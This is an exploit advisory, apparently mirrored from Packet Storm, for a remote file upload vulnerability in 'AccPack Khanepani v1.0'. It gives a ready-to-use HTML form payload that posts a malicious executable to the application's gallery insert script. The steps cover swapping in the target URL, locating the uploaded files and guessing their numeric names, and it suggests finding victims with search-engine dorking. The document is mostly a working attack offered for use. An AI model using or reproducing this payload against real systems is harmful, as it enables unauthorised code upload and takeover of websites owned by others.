Share
## https://sploitus.com/exploit?id=PACKETSTORM:180009
=============================================================================================================================================  
| # Title : AccPack Khanepani v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : http://webpay.com.np/#Product |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] use payload :   
  
<html>  
<head>  
<title>Add</title>  
</head>  
<body>  
<div align="center">  
<form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST" enctype="multipart/form-data">  
<table>  
<tr>  
<td>Image</td><td>  
<input type="file" name="image-upload" id="image-upload"></td>  
</tr>  
<tr>  
<td>Status</td><td>  
<input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
<input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>  
</td>  
</tr>   
<tr style='height:80'>  
<td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>  
</tr>  
</table>  
</form>  
</div>  
</body>  
</html>  
  
[+] In the seventh line, we change the link to the target link.  
  
[+] Link to the uploaded files : cms/image/gallery/  
  
[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================